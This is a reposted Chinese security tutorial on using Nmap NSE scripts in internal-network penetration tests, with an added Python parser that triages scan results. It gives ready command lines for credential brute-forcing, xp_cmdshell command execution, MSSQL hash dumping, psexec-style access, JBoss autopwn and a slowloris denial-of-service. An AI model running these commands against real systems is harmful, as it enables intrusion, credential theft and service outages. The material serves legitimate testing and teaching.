Nmap Script Usage Summary (reposted from WooYun), Part 2

Source: Internet
Author: User
Tags: app service, snmp, rsync

Nmap Script Usage Summary, by clzzy, 2014/06/08 11:24


0x00 Preface:

A basic introduction to Nmap and its basic usage has already been submitted to the WooYun knowledge base in considerable detail, so this article does not repeat it. Link: http://drops.wooyun.org/tips/2002

This article mainly explains how to use many of Nmap's scripts, which are especially useful when penetration testing an internal network.

0x01 Nmap scan by script category

Nmap scripts are divided into the following categories; during a scan you can select a whole category with --script=<category> to run a broader scan:

auth: scripts that handle authentication credentials (bypassing authentication)
broadcast: discovers more enabled services on the local network, such as dhcp/dns/sqlserver
brute: brute-force password guessing against common applications such as http/snmp
default: the scripts run by default with the -sC or -A option; basic script scanning capability
discovery: gathers more information about the network, such as SMB enumeration and SNMP queries
dos: used to carry out denial-of-service attacks
exploit: exploits known vulnerabilities to break into the system
external: uses third-party databases or resources, for example whois lookups
fuzzer: fuzzing scripts that send malformed packets to the target to find potential vulnerabilities
intrusive: intrusive scripts that may cause the target's IDS/IPS to log or block the scan
malware: checks whether the target is infected with malware or has a backdoor open
safe: the opposite of intrusive; scripts considered safe to run
version: scripts that enhance service and version detection
vuln: checks whether the target has common vulnerabilities, for example MS08-067

Usage by category:

(1) nmap --script=auth 192.168.137.*

Scripts that handle authentication credentials (bypassing authentication); can also be used to detect weak passwords in some applications

(2) nmap --script=brute 192.168.137.*

Brute-forces simple passwords for databases, SMB, SNMP, etc.

(3) nmap --script=default 192.168.137.* or nmap -sC 192.168.137.*

The default script scan; mainly collects information about the various application services, which can then be used to target a specific service

(4) nmap --script=vuln 192.168.137.*

Checks for common vulnerabilities

(5) nmap -n -p445 --script=broadcast 192.168.137.4

Discovers more enabled services within the LAN

(6) nmap --script external 202.103.243.110

Uses third-party databases or resources, such as WHOIS resolution

0x02 Nmap scan by application service

(1) VNC scan:

Check for the RealVNC authentication bypass

nmap --script=realvnc-auth-bypass 192.168.137.4

Check the VNC authentication method

nmap --script=vnc-auth 192.168.137.4

Get VNC information

nmap --script=vnc-info 192.168.137.4

(2) SMB scan:

SMB brute force

nmap --script=smb-brute.nse 192.168.137.4

SMB dictionary attack

nmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4

Check SMB for several known serious vulnerabilities

nmap --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.4

View shared directories

nmap -p 445 --script smb-ls --script-args 'share=e$,path=\,smbuser=test,smbpass=test' 192.168.137.4

Query the host for some sensitive information (note: requires downloading Nmap_service)

nmap -p 445 -n --script=smb-psexec --script-args=smbuser=test,smbpass=test 192.168.137.4

View sessions

nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=test,smbpass=test 192.168.137.4

System information

nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=test,smbpass=test 192.168.137.4

(3) MSSQL scan:

Guess MSSQL usernames and passwords

nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4

Execute a command via xp_cmdshell

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4

Dump password hashes

nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa 192.168.137.4

(4) MySQL scan:

Scan for an empty root password

nmap -p3306 --script=mysql-empty-password.nse 192.168.137.4

List all MySQL users

nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.137.4

Run every script for the same application (wildcard)

nmap --script=mysql-* 192.168.137.4

(5) Oracle scan:

Oracle SID scan

Oracle weak password brute force

nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 192.168.137.5

(6) Some other scripts that are quite useful

nmap --script=broadcast-netbios-master-browser 192.168.137.4   discover the gateway
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4   rsync brute force
nmap --script informix-brute -p 9088 192.168.137.4   Informix database brute force
nmap -p 5432 --script pgsql-brute 192.168.137.4   PostgreSQL brute force
nmap -sU --script snmp-brute 192.168.137.4   SNMP brute force
nmap -sV --script=telnet-brute 192.168.137.4   Telnet brute force
nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' <target>   JBoss autopwn
nmap --script=http-methods.nse 192.168.137.4   check HTTP methods
nmap --script http-slowloris --max-parallelism 400 192.168.137.4   DoS attack using 'half-HTTP' connections; works quite well against sites with little processing capacity
nmap --script=samba-vuln-cve-2012-1182 -p 139 192.168.137.4

(7) Unreliable scripts:

vnc-brute: after a number of attempts the target refuses further connections

pcanywhere-brute: same as above
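Once the scans above have been run with -oX, the script results need to be triaged rather than read by eye. The following is an added example, not code from the original article: it parses Nmap's XML report, classifies each NSE script result by the wording the scripts print (VULNERABLE lines, empty or valid credentials), and returns only the findings that need remediation. The XML sample is constructed for the example and uses the article's lab address.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample of `nmap -oX` output (not a real scan; trimmed to the elements read below).
SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -oX - --script=vuln,mysql-* 192.168.137.4">
<host><status state="up"/><address addr="192.168.137.4" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="3306"><state state="open"/><service name="mysql"/>
<script id="mysql-empty-password" output="&#xa;  root account has empty password"/></port>
<port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/>
<script id="smb-os-discovery" output="&#xa;  OS: Windows Server 2003"/></port></ports>
<hostscript><script id="smb-check-vulns" output="&#xa;  MS08-067: VULNERABLE&#xa;  MS06-025: NOT VULNERABLE"/>
</hostscript></host></nmaprun>"""

@dataclass
class Finding:
    host: str
    where: str      # "445/tcp" for port scripts, "host" for hostscript results
    script: str
    severity: str   # "vulnerable", "weak-auth" or "info"

def classify(script_id: str, output: str) -> str:
    """Bucket a result by the wording NSE scripts print (VULNERABLE lines, empty/valid credentials)."""
    lines = [ln.strip() for ln in output.splitlines()]
    if any("VULNERABLE" in ln and "NOT VULNERABLE" not in ln for ln in lines):
        return "vulnerable"
    if script_id.endswith("empty-password") and "empty password" in output:
        return "weak-auth"
    if script_id.endswith("-brute") and "Valid credentials" in output:
        return "weak-auth"
    return "info"

def parse_findings(xml_text: str) -> list:
    """Walk every host, port script and hostscript result in the XML report."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            where = f"{port.get('portid')}/{port.get('protocol')}"
            for s in port.iter("script"):
                findings.append(Finding(addr, where, s.get("id"), classify(s.get("id"), s.get("output", ""))))
        for s in host.findall("hostscript/script"):
            findings.append(Finding(addr, "host", s.get("id"), classify(s.get("id"), s.get("output", ""))))
    return findings

def needs_action(findings) -> list:
    """Keep only results that need remediation, most severe first."""
    rank = {"vulnerable": 0, "weak-auth": 1}
    return sorted((f for f in findings if f.severity in rank), key=lambda f: rank[f.severity])
```

On a real report, call parse_findings(open("scan.xml").read()) and feed the result to needs_action; informational results such as smb-os-discovery are dropped, so what remains is the remediation list.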

0x03 Learning to analyze scripts

Nmap scripts are not hard to read, so if you do not understand how one works you can read the script itself; you can also modify some of its parameters to suit your own needs.

Example:

Oracle weak password cracking:

Call chain: oracle-brute.nse >> oracle-default-accounts.lst

First the brute-force script is called:

The location of the dictionary in the script shows the default dictionary; you can of course add your own entries, or modify the script or its arguments to change the dictionary that is used:
